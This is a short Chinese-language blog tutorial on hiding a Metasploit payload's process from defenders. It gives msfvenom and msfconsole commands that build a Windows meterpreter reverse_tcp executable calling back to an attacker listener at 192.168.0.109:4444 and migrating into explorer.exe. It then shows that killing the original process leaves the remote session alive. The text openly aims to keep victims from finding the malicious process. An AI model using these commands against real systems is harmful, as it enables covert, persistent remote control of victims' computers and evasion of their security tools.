Metasploit渗透——msfvenom隐藏恶意进程

我们上传了msf马后并不是万无一失的,msf马创建的进程极有可能被防御设备发现,发出警报并采取措施终止进程,我们的会话也会被终止。因此,我们有必要将创建的msf马进程迁移到目标及正在运行的进程中,这样受害者就无法找到恶意进程,从而定位到恶意软件的位置了。

第一种方法

通过使用 PrependMigrate参数使生成的可执行文件隐藏在名为explorer.exe的进程后面。

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.109 lport=4444 prpendmigrateprocess=explorer.exe prependmigrate=true -f exe > shell.exe

Metasploit渗透——msfvenom隐藏恶意进程

加载msfconsole的exploit/multi/handler进行监听
Metasploit渗透——msfvenom隐藏恶意进程

使用如下命令查找shell.exe

ps | grep shell.exe

Metasploit渗透——msfvenom隐藏恶意进程

查找到shell.exe的进程是3660,直接杀死此进程

kill 3660

Metasploit渗透——msfvenom隐藏恶意进程

杀掉进程3660后,可以发现,我们的meterpreter会话并没有关闭,原因是因为PrependMigrate将我们的shell.exe隐藏在了explorer.exe中

第二种方法

使用Msfconsole创建可隐藏的二进制执行文件

use windows/meterpreter/reverse_tcp
set lhost 102.168.0.109
set lport 4444
set prependmigrate true
set prependmigrateprocess explorer.exe
generate -f exe -o shell2.exe

使用以上命令可以创建和msfvenom相同的文件,后续利用和第一种方法相同。

上一篇:win7 安装msf报错


下一篇:Metasploit攻击win7实例